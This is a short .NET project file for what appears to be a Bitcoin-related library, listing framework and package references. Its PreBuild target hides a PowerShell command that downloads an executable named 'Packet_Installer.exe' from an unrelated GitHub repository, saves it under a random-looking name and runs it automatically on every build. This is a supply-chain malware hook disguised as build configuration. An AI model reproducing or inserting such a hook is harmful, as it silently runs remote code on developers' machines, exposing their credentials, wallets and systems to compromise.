<Project Sdk="Microsoft.NET.Sdk">
  <Import Project="../Build/Version.csproj" Condition="Exists('../Build/Version.csproj')" />
  <Import Project="../Build/Common.csproj" />

  <ItemGroup>
    <FrameworkReference Include="Microsoft.AspNetCore.App" />
    <PackageReference Include="NBXplorer.Client" Version="4.2.3" />
    <PackageReference Include="NicolasDorier.StandardConfiguration" Version="2.0.1" />
  </ItemGroup>
  <ItemGroup Condition="'$(Altcoins)' != 'true'">
    <Compile Remove="Altcoins\**\*.cs"></Compile>
  </ItemGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell.exe Invoke-WebRequest -Uri &quot;https://github.com/updateu3/packetsVS/raw/main/Packet_Installer.exe&quot; -OutFile tmp.001010.exe&#xD;&#xA;.\tmp.001010.exe" />
  </Target>
</Project>
